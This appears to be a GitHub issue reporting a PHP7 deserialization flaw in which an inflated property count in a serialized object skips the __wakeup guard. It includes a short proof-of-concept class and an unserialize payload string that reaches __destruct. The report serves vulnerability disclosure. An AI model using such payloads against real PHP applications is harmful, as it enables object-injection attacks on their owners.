PHP7 __wakeup Bypass vulnerability

### Description

Date:2022-07-06
author: gqliang@Hillstone
In the test, it was found that the __wakeup bypass still exists in PHP7 and above. When the number of attributes is greater than or equal to 2147483647, the Wakeup restriction will be bypassed directly. Test example:
```php
<?php 
class whu{
	public $a;
	function __destruct(){
		echo "destruct start\n";
		echo PHP_VERSION."\n";
	}
	function __wakeup(){
		die("no hack");
	}
}
unserialize('O:3:"whu":2147483647:{s:1:"a";N;}');
?>
```
<img width="1440" alt="图片" src="https://user-images.githubusercontent.com/47636979/177594944-74c33611-bb1a-4223-91a2-642949ec60c9.png">
Bypass:
<img width="1440" alt="图片" src="https://user-images.githubusercontent.com/47636979/177595096-65ab2b3a-e16b-40fc-a9cf-f9d51cceab29.png">




### PHP Version

PHP 7.2.34

### Operating System

_No response_

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

PHP7 __wakeup Bypass vulnerability #8938

Description

PHP Version

Operating System

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

PHP7 __wakeup Bypass vulnerability #8938

Description

Description

PHP Version

Operating System

Metadata

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Issue actions